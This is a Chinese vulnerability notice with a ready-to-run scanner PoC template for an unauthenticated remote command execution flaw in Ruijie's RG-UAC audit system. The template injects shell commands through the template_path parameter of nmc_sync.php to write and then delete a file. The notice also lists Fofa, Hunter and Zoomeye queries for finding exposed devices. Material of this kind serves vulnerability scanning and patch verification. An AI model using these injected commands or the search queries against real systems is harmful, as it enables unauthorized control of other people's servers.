漏洞描述
锐捷RG-UAC统一上网行为管理审计系统 nmc_sync.php 接口处存在命令执行漏洞,未经身份认证的攻击者可执行任意命令控制服务器权限。
Fofa: title="RG-UAC登录页面" && body="admin" || app="Ruijie-RG-UAC" || title="rg-uac"
Hunter: app.name="Ruijie 锐捷 RG-UAC"
Zoomeye: app:"锐捷RG-UAC统一上网行为管理审计系统"
ruijie-rg-uac-nmc-sync-rce: 锐捷RG-UAC nmc_sync.php存在RCE漏洞
PoC代码[已公开]
id: ruijie-rg-uac-nmc-sync-rce
info:
name: 锐捷RG-UAC nmc_sync.php存在RCE漏洞
author: Y3y1ng
severity: critical
verified: true
description: |-
锐捷RG-UAC统一上网行为管理审计系统 nmc_sync.php 接口处存在命令执行漏洞,未经身份认证的攻击者可执行任意命令控制服务器权限。
Fofa: title="RG-UAC登录页面" && body="admin" || app="Ruijie-RG-UAC" || title="rg-uac"
Hunter: app.name="Ruijie 锐捷 RG-UAC"
Zoomeye: app:"锐捷RG-UAC统一上网行为管理审计系统"
reference:
- https://mp.weixin.qq.com/s/_IPk892U5q5ctVqehCoGig
- https://github.com/xinyisleep/pocscan/blob/ee0c74e68ec95b82a4e4ebcdb961d6ed18a44b77/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7_EG%E6%98%93%E7%BD%91%E5%85%B3_%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E5%89%8D%E5%8F%B0RCE.py
tags: ruijie,rce
created: 2023/12/10
set:
r1: randomLowercase(4)
md5: md5(r1)
rules:
r0:
request:
method: GET
path: /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|echo {{md5}} > {{r1}}.txt|cat
expression: |
response.status == 200
r1:
request:
before_sleep: 1
method: GET
path: /view/systemConfig/management/{{r1}}.txt
expression: |
response.status == 200 &&
response.body.bcontains(bytes(md5))
r2:
request:
before_sleep: 1
method: GET
path: /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|rm {{r1}}.txt|cat
expression: |
response.status == 200
expression: r0() && r1() && r2()